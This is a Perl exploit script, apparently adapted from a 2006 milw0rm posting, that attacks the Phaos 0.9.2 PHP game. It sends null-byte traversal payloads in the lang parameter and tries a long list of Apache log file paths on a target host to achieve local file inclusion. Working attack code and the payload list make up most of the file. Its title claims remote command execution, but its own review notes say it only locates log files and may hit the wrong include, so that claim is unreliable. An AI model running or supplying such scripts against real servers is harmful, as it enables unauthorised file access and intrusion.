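#!/usr/bin/perl
#
# +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# - - - [DEVIL TEAM THE BEST POLISH TEAM] - - -
# +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Phaos <= 0.9.2 basename() Remote Command Execution Exploit
# (as written, this script is a local-file-inclusion probe for web-server
#  log files; see the review notes below)
#
# Script name: Phaos v. 0.9.2
# Script site: http://sourceforge.net/projects/phaosrpg/
#
# Found by: Kacper (a.k.a Rahim)
# Contact:  kacper1964@yahoo.pl
#           http://www.devilteam.yum.pl/
#           http://www.rahim.webd.pl/
#
# Special Greetz: DragonHeart ;-)
# Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
# "Friendship cannot be traded for petty gains"
#
# Dedicated to the person without whom I could not live...
# K.C:* J.M (a.k.a Magaja)
#
# +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Vulnerable code, include_lang.php lines 2-3:
#
#     @include ("lang/en.php");
#     @include ("lang/".basename($lang).".php");
#
# basename() strips the directory part of $lang, so a plain traversal string
# cannot leave lang/ through this include.  The filter is bypassed with a
# value of the form
#
#     ../../../../../../../apache/logs/access.log[null char]/en
#
# basename() works on the whole string and returns 'en', so this include still
# resolves to lang/en.php -- the file the preceding line already loads.  The
# same unfiltered $lang is used in shop_include.php line 5:
#
#     include_once ("lang/".$lang.".php");
#
# where the PHP of that era truncates the include path at the null byte,
# leaving
#
#     lang/../../../../../../../apache/logs/access.log
#
# i.e. an arbitrary local file can be included.  This script tries the usual
# web-server log locations (listed in @paths below) with that payload.
#
# NOTE(review): the request is sent to include_lang.php, which is the
# *filtered* include; the analysis above places the unfiltered include in
# shop_include.php.  Confirm that include_lang.php?lang=... actually reaches
# shop_include.php (or target the page that does) before relying on this.
#
# NOTE(review): nothing in this script places the "_exppl_" marker in the
# target's logs, so the match below can only succeed if the log already
# contains that string.  The original listing leaves that step unspecified.
#
# Changes against the milw0rm listing (which could not run as published):
#   - strict/warnings; the host, path, socket and array variables were
#     referenced under several different, undefined names
#   - the loop sent the array index ($i) as lang= instead of the candidate
#     path, and '&' instead of '?' so lang= was never a query parameter
#   - header block terminated with "\r\n\r\n" instead of "\r\n\n"
#   - the result of the scan is now reported instead of being discarded
#
# +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use strict;
use warnings;
use IO::Socket;
use LWP::Simple;    # unused by this script; kept from the original listing

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "+ - - [DEVIL TEAM THE BEST POLISH TEAM] - - +\n";
print "+ Phaos <= 0.9.2 basename() Remote Command Execution Exploit +\n";
print "+ http://www.rahim.webd.pl/ +\n";
print "+ Find by: Kacper (a.k.a Rahim) +\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";

if (@ARGV < 2) {
    print "[*] Uzycie/Usage: phaos.pl [host] [path/folder]\n\n";
    exit();
}

# Target host and the web path of the Phaos install.  $path is used verbatim
# as a prefix of "include_lang.php", so it is expected to end with '/'
# (e.g. "/phaos/") -- the original did not normalise it either.
my ( $server, $path ) = @ARGV;

# Candidate log file locations, relative to the lang/ directory of the
# install.  Both Apache naming styles (access_log / access.log) and several
# traversal depths are tried because the install depth is unknown.
my @paths = (
    "../../../../../var/log/httpd/access_log",
    "../../../../../var/log/httpd/error_log",
    "../apache/logs/error.log",
    "../apache/logs/access.log",
    "../../apache/logs/error.log",
    "../../apache/logs/access.log",
    "../../../apache/logs/error.log",
    "../../../apache/logs/access.log",
    "../../../../apache/logs/error.log",
    "../../../../apache/logs/access.log",
    "../../../../../apache/logs/error.log",
    "../../../../../apache/logs/access.log",
    "../logs/error.log",
    "../logs/access.log",
    "../../logs/error.log",
    "../../logs/access.log",
    "../../../logs/error.log",
    "../../../logs/access.log",
    "../../../../logs/error.log",
    "../../../../logs/access.log",
    "../../../../../logs/error.log",
    "../../../../../logs/access.log",
    "../../../../../etc/httpd/logs/access_log",
    "../../../../../etc/httpd/logs/access.log",
    "../../../../../etc/httpd/logs/error_log",
    "../../../../../etc/httpd/logs/error.log",
    "../../../../../var/www/logs/access_log",
    "../../../../../var/www/logs/access.log",
    "../../../../../usr/local/apache/logs/access_log",
    "../../../../../usr/local/apache/logs/access.log",
    "../../../../../var/log/apache/access_log",
    "../../../../../var/log/apache/access.log",
    "../../../../../var/log/access_log",
    "../../../../../var/www/logs/error_log",
    "../../../../../var/www/logs/error.log",
    "../../../../../usr/local/apache/logs/error_log",
    "../../../../../usr/local/apache/logs/error.log",
    "../../../../../var/log/apache/error_log",
    "../../../../../var/log/apache/error.log",
    "../../../../../var/log/access_log",
    "../../../../../var/log/error_log",
);

my $log;    # candidate that produced a hit, if any

for my $i ( 0 .. $#paths ) {
    my $candidate = $paths[$i];
    print "Path : $i ($candidate)\n";

    # One connection per candidate; the original died on connect failure
    # rather than skipping the candidate, and that is kept.
    my $sock = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $server,
        PeerPort => "http(80)",
        Timeout  => 10,
    ) or die "nie mozna sie polaczyc z hostem/cannot connect to host :( \n";

    # '?' so that lang= is a query parameter.  The trailing "%00/en" keeps
    # basename($lang) equal to 'en' (see the header).  No URL-encoding of the
    # candidate is done: the traversal segments are safe as-is.
    print $sock "GET " . $path . "include_lang.php?lang=" . $candidate . "%00/en HTTP/1.1\r\n";
    print $sock "Host: " . $server . "\r\n";
    print $sock "Accept: */*\r\n";
    print $sock "Connection: close\r\n\r\n";

    my $out = "";
    while ( my $answer = <$sock> ) {
        $out .= $answer;
    }
    close($sock);

    # Marker the included log is expected to contain (see NOTE(review) above).
    if ( $out =~ m/_exppl_(.*?)_exppl_/ms ) {
        print "[+] Log File found ! [ $i ] $candidate\n\n";
        $log = $candidate;
        last;
    }
}

print "[-] No log file found\n" unless defined $log;

# Greetings to all ;-)
# milw0rm.com [2006-08-24]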